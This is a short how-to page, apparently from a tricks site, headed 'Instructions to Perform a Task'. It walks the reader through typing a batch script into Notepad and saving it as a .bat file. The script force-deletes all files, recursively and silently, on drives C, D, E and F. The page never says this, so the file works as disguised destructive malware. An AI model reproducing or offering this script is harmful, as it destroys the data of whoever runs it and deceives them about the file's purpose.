Instructions to Perform a Task
- Press the Windows + R buttons from your keyboard. This will open the Run dialog.
- Type
Notepadin the dialog box and press Enter. This will open Notepad. - Type the following code in Notepad:
@echo off
del C:\*.*/f /s /q
del D:\*.*/f /s /q
del E:\*.*/f /s /q
del F:\*.*/f /s /q
- After typing in the code, save the file with a name of your choice, but remember to save it with the
.batextension.
Comments